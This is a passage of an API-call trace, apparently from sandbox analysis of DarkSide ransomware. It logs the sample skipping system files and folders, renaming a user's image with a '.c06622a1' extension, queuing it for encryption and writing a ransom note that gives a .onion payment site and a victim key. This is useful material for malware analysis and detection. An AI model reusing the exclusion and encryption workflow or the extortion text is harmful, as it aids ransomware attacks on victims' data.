ftLastWriteTime.dwHighDateTime=0x1d5e3da, nFileSizeHigh=0x0, nFileSizeLow=0x181f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppxLbB.gif", cAlternateFileName="")) returned 1 [0167.339] _wcsicmp (_Str1="ppxLbB.gif", _Str2="README.c06622a1.TXT") returned -2 [0167.339] wcsstr (_Str="ppxLbB.gif", _SubStr="README") returned 0x0 [0167.339] _wcsicmp (_Str1="autorun.inf", _Str2="ppxLbB.gif") returned -15 [0167.339] wcslen (_String="autorun.inf") returned 0xb [0167.339] _wcsicmp (_Str1="boot.ini", _Str2="ppxLbB.gif") returned -14 [0167.339] wcslen (_String="boot.ini") returned 0x8 [0167.339] _wcsicmp (_Str1="bootfont.bin", _Str2="ppxLbB.gif") returned -14 [0167.339] wcslen (_String="bootfont.bin") returned 0xc [0167.339] _wcsicmp (_Str1="bootsect.bak", _Str2="ppxLbB.gif") returned -14 [0167.339] wcslen (_String="bootsect.bak") returned 0xc [0167.339] _wcsicmp (_Str1="desktop.ini", _Str2="ppxLbB.gif") returned -12 [0167.339] wcslen (_String="desktop.ini") returned 0xb [0167.339] _wcsicmp (_Str1="iconcache.db", _Str2="ppxLbB.gif") returned -7 [0167.339] wcslen (_String="iconcache.db") returned 0xc [0167.339] _wcsicmp (_Str1="ntldr", _Str2="ppxLbB.gif") returned -2 [0167.339] wcslen (_String="ntldr") returned 0x5 [0167.339] _wcsicmp (_Str1="ntuser.dat", _Str2="ppxLbB.gif") returned -2 [0167.339] wcslen (_String="ntuser.dat") returned 0xa [0167.340] _wcsicmp (_Str1="ntuser.dat.log", _Str2="ppxLbB.gif") returned -2 [0167.340] wcslen (_String="ntuser.dat.log") returned 0xe [0167.340] _wcsicmp (_Str1="ntuser.ini", _Str2="ppxLbB.gif") returned -2 [0167.340] wcslen (_String="ntuser.ini") returned 0xa [0167.340] _wcsicmp (_Str1="thumbs.db", _Str2="ppxLbB.gif") returned 4 [0167.340] wcslen (_String="thumbs.db") returned 0x9 [0167.340] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0167.340] wcslen (_String="386") returned 0x3 [0167.340] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0167.340] wcslen (_String="adv") returned 0x3 [0167.340] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0167.340] wcslen (_String="ani") returned 0x3 [0167.340] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0167.340] wcslen (_String="bat") returned 0x3 [0167.340] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0167.340] wcslen (_String="bin") returned 0x3 [0167.340] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0167.340] wcslen (_String="cab") returned 0x3 [0167.340] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0167.340] wcslen (_String="cmd") returned 0x3 [0167.340] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0167.340] wcslen (_String="com") returned 0x3 [0167.340] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0167.340] wcslen (_String="cpl") returned 0x3 [0167.340] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0167.340] wcslen (_String="cur") returned 0x3 [0167.340] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0167.340] wcslen (_String="deskthemepack") returned 0xd [0167.340] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0167.340] wcslen (_String="diagcab") returned 0x7 [0167.340] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0167.341] wcslen (_String="diagcfg") returned 0x7 [0167.341] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0167.341] wcslen (_String="diagpkg") returned 0x7 [0167.341] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0167.341] wcslen (_String="dll") returned 0x3 [0167.341] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0167.341] wcslen (_String="drv") returned 0x3 [0167.341] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0167.341] wcslen (_String="exe") returned 0x3 [0167.341] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0167.341] wcslen (_String="hlp") returned 0x3 [0167.341] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0167.341] wcslen (_String="icl") returned 0x3 [0167.341] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0167.341] wcslen (_String="icns") returned 0x4 [0167.341] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0167.341] wcslen (_String="ico") returned 0x3 [0167.341] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0167.341] wcslen (_String="ics") returned 0x3 [0167.341] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0167.341] wcslen (_String="idx") returned 0x3 [0167.341] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0167.341] wcslen (_String="ldf") returned 0x3 [0167.341] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0167.341] wcslen (_String="lnk") returned 0x3 [0167.341] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0167.341] wcslen (_String="mod") returned 0x3 [0167.341] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0167.341] wcslen (_String="mpa") returned 0x3 [0167.341] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0167.341] wcslen (_String="msc") returned 0x3 [0167.341] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0167.341] wcslen (_String="msp") returned 0x3 [0167.342] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0167.342] wcslen (_String="msstyles") returned 0x8 [0167.342] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0167.342] wcslen (_String="msu") returned 0x3 [0167.342] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0167.342] wcslen (_String="nls") returned 0x3 [0167.342] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0167.342] wcslen (_String="nomedia") returned 0x7 [0167.342] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0167.342] wcslen (_String="ocx") returned 0x3 [0167.342] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0167.342] wcslen (_String="prf") returned 0x3 [0167.342] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0167.342] wcslen (_String="ps1") returned 0x3 [0167.342] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0167.342] wcslen (_String="rom") returned 0x3 [0167.342] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0167.342] wcslen (_String="rtp") returned 0x3 [0167.342] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0167.342] wcslen (_String="scr") returned 0x3 [0167.342] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0167.342] wcslen (_String="shs") returned 0x3 [0167.342] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0167.342] wcslen (_String="spl") returned 0x3 [0167.342] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0167.342] wcslen (_String="sys") returned 0x3 [0167.342] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0167.342] wcslen (_String="theme") returned 0x5 [0167.342] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0167.342] wcslen (_String="themepack") returned 0x9 [0167.342] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0167.343] wcslen (_String="wpx") returned 0x3 [0167.343] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0167.343] wcslen (_String="lock") returned 0x4 [0167.343] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0167.343] wcslen (_String="key") returned 0x3 [0167.343] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0167.343] wcslen (_String="hta") returned 0x3 [0167.343] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0167.343] wcslen (_String="msi") returned 0x3 [0167.343] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0167.343] wcslen (_String="pdb") returned 0x3 [0167.343] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0167.343] wcslen (_String="sqlite") returned 0x6 [0167.343] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22")) returned 0x10 [0167.343] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0167.343] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22" [0167.343] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22") returned 0x4d [0167.343] wcscpy (in: _Dest=0x32b2134, _Source="ppxLbB.gif" | out: _Dest="ppxLbB.gif") returned="ppxLbB.gif" [0167.343] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\ppxLbB.gif", dwFileAttributes=0x80) returned 1 [0167.344] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\ppxLbB.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\ppxlbb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0167.344] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.344] ReadFile (in: hFile=0x1a0, lpBuffer=0x32e4a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e534, lpOverlapped=0x0 | out: lpBuffer=0x32e4a4*, lpNumberOfBytesRead=0x32e534*=0x90, lpOverlapped=0x0) returned 1 [0167.345] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e4a4, Length=0x80) returned 0x9ffc3644 [0167.345] RtlComputeCrc32 (PartialCrc=0x3644, Buffer=0x32e4a4, Length=0x80) returned 0x639c66ee [0167.345] RtlComputeCrc32 (PartialCrc=0x66ee, Buffer=0x32e4a4, Length=0x80) returned 0x98f9a29e [0167.345] RtlComputeCrc32 (PartialCrc=0xa29e, Buffer=0x32e4a4, Length=0x80) returned 0xa43b15bf [0167.345] RtlComputeCrc32 (PartialCrc=0x15bf, Buffer=0x32e4a4, Length=0x80) returned 0xd2aed232 [0167.345] CloseHandle (hObject=0x1a0) returned 1 [0167.345] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32c20a0 [0167.345] wcscpy (in: _Dest=0x32c20a0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\ppxLbB.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\ppxLbB.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\ppxLbB.gif" [0167.345] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\ppxLbB.gif") returned 0x58 [0167.345] wcscpy (in: _Dest=0x32c2150, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.345] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\ppxLbB.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\ppxlbb.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\ppxLbB.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\ppxlbb.gif.c06622a1"), dwFlags=0x8) returned 1 [0167.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\ppxLbB.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\ppxlbb.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a0 [0167.371] CreateIoCompletionPort (FileHandle=0x1a0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.371] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0167.377] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4637743f [0167.377] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x67703ca4 [0167.377] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x54188a4e [0167.377] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7f1ac1e0 [0167.377] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1dc649a5 [0167.377] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5595a250 [0167.377] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5e0a2f40 [0167.377] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5c6151b7 [0167.381] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x35eeaab1 [0167.381] RtlComputeCrc32 (PartialCrc=0xaab1, Buffer=0x710094, Length=0x80) returned 0xd34bf91c [0167.381] RtlComputeCrc32 (PartialCrc=0xf91c, Buffer=0x710094, Length=0x80) returned 0x35731461 [0167.381] RtlComputeCrc32 (PartialCrc=0x1461, Buffer=0x710094, Length=0x80) returned 0xb1d7f2b7 [0167.381] RtlComputeCrc32 (PartialCrc=0xf2b7, Buffer=0x710094, Length=0x80) returned 0x82049211 [0167.381] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0167.381] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0167.383] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32c20a0) returned 1 [0167.384] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x915e5580, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x915e5580, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x915e5580, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0167.384] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0167.384] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x271fee50, ftCreationTime.dwHighDateTime=0x1d5dcd0, ftLastAccessTime.dwLowDateTime=0x35d7e510, ftLastAccessTime.dwHighDateTime=0x1d5e275, ftLastWriteTime.dwLowDateTime=0x35d7e510, ftLastWriteTime.dwHighDateTime=0x1d5e275, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uAJ_dGqh_G", cAlternateFileName="UAJ_DG~1")) returned 1 [0167.384] _wcsicmp (_Str1="$recycle.bin", _Str2="uAJ_dGqh_G") returned -81 [0167.384] wcslen (_String="$recycle.bin") returned 0xc [0167.384] _wcsicmp (_Str1="config.msi", _Str2="uAJ_dGqh_G") returned -18 [0167.384] wcslen (_String="config.msi") returned 0xa [0167.384] _wcsicmp (_Str1="$windows.~bt", _Str2="uAJ_dGqh_G") returned -81 [0167.384] wcslen (_String="$windows.~bt") returned 0xc [0167.384] _wcsicmp (_Str1="$windows.~ws", _Str2="uAJ_dGqh_G") returned -81 [0167.384] wcslen (_String="$windows.~ws") returned 0xc [0167.385] _wcsicmp (_Str1="windows", _Str2="uAJ_dGqh_G") returned 2 [0167.385] wcslen (_String="windows") returned 0x7 [0167.385] _wcsicmp (_Str1="appdata", _Str2="uAJ_dGqh_G") returned -20 [0167.385] wcslen (_String="appdata") returned 0x7 [0167.385] _wcsicmp (_Str1="application data", _Str2="uAJ_dGqh_G") returned -20 [0167.385] wcslen (_String="application data") returned 0x10 [0167.385] _wcsicmp (_Str1="boot", _Str2="uAJ_dGqh_G") returned -19 [0167.385] wcslen (_String="boot") returned 0x4 [0167.385] _wcsicmp (_Str1="google", _Str2="uAJ_dGqh_G") returned -14 [0167.385] wcslen (_String="google") returned 0x6 [0167.385] _wcsicmp (_Str1="mozilla", _Str2="uAJ_dGqh_G") returned -8 [0167.385] wcslen (_String="mozilla") returned 0x7 [0167.385] _wcsicmp (_Str1="program files", _Str2="uAJ_dGqh_G") returned -5 [0167.385] wcslen (_String="program files") returned 0xd [0167.385] _wcsicmp (_Str1="program files (x86)", _Str2="uAJ_dGqh_G") returned -5 [0167.385] wcslen (_String="program files (x86)") returned 0x13 [0167.385] _wcsicmp (_Str1="programdata", _Str2="uAJ_dGqh_G") returned -5 [0167.385] wcslen (_String="programdata") returned 0xb [0167.385] _wcsicmp (_Str1="system volume information", _Str2="uAJ_dGqh_G") returned -2 [0167.385] wcslen (_String="system volume information") returned 0x19 [0167.385] _wcsicmp (_Str1="tor browser", _Str2="uAJ_dGqh_G") returned -1 [0167.385] wcslen (_String="tor browser") returned 0xb [0167.385] _wcsicmp (_Str1="windows.old", _Str2="uAJ_dGqh_G") returned 2 [0167.385] wcslen (_String="windows.old") returned 0xb [0167.385] _wcsicmp (_Str1="intel", _Str2="uAJ_dGqh_G") returned -12 [0167.385] wcslen (_String="intel") returned 0x5 [0167.385] _wcsicmp (_Str1="msocache", _Str2="uAJ_dGqh_G") returned -8 [0167.385] wcslen (_String="msocache") returned 0x8 [0167.386] _wcsicmp (_Str1="perflogs", _Str2="uAJ_dGqh_G") returned -5 [0167.386] wcslen (_String="perflogs") returned 0x8 [0167.386] _wcsicmp (_Str1="x64dbg", _Str2="uAJ_dGqh_G") returned 3 [0167.386] wcslen (_String="x64dbg") returned 0x6 [0167.386] _wcsicmp (_Str1="public", _Str2="uAJ_dGqh_G") returned -5 [0167.386] wcslen (_String="public") returned 0x6 [0167.386] _wcsicmp (_Str1="all users", _Str2="uAJ_dGqh_G") returned -20 [0167.386] wcslen (_String="all users") returned 0x9 [0167.386] _wcsicmp (_Str1="default", _Str2="uAJ_dGqh_G") returned -17 [0167.386] wcslen (_String="default") returned 0x7 [0167.386] wcscpy (in: _Dest=0x3292088, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\*" [0167.386] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\*") returned 0x4f [0167.386] wcscpy (in: _Dest=0x3292124, _Source="uAJ_dGqh_G" | out: _Dest="uAJ_dGqh_G") returned="uAJ_dGqh_G" [0167.386] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32b2098 [0167.386] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32c20a0 [0167.387] wcscpy (in: _Dest=0x32b2098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G" [0167.387] GetNamedSecurityInfoW () returned 0x0 [0167.388] SetEntriesInAclW () returned 0x0 [0167.388] SetNamedSecurityInfoW () returned 0x0 [0167.400] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22c108) returned 1 [0167.400] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e16c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.400] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\uaj_dgqh_g")) returned 1 [0167.400] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0167.400] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\uaj_dgqh_g\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0167.403] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e13c, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e13c*=0x7ca, lpOverlapped=0x0) returned 1 [0167.404] CloseHandle (hObject=0x1bc) returned 1 [0167.404] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.404] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\uaj_dgqh_g")) returned 0x10 [0167.404] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\") returned="" [0167.404] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\") returned 0x59 [0167.405] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\uAJ_dGqh_G\\*", fInfoLevelId=0x0, lpFindFileData=0x32e39c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32e39c) returned 0x154248 [0167.405] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x271fee50, ftCreationTime.dwHighDateTime=0x1d5dcd0, ftLastAccessTime.dwLowDateTime=0x917ae600, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x917ae600, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.405] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x848369f0, ftCreationTime.dwHighDateTime=0x1d5e75c, ftLastAccessTime.dwLowDateTime=0x66c321a0, ftLastAccessTime.dwHighDateTime=0x1d5e138, ftLastWriteTime.dwLowDateTime=0x66c321a0, ftLastWriteTime.dwHighDateTime=0x1d5e138, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EUipMAzv61Xk2n2", cAlternateFileName="EUIPMA~1")) returned 1 [0167.405] _wcsicmp (_Str1="$recycle.bin", _Str2="EUipMAzv61Xk2n2") returned -65 [0167.405] wcslen (_String="$recycle.bin") returned 0xc [0167.406] _wcsicmp (_Str1="config.msi", _Str2="EUipMAzv61Xk2n2") returned -2 [0167.406] wcslen (_String="config.msi") returned 0xa [0167.406] _wcsicmp (_Str1="$windows.~bt", _Str2="EUipMAzv61Xk2n2") returned -65 [0167.406] wcslen (_String="$windows.~bt") returned 0xc [0167.406] _wcsicmp (_Str1="$windows.~ws", _Str2="EUipMAzv61Xk2n2") returned -65 [0167.406] wcslen (_String="$windows.~ws") returned 0xc [0167.406] _wcsicmp (_Str1="windows", _Str2="EUipMAzv61Xk2n2") returned 18 [0167.406] wcslen (_String="windows") 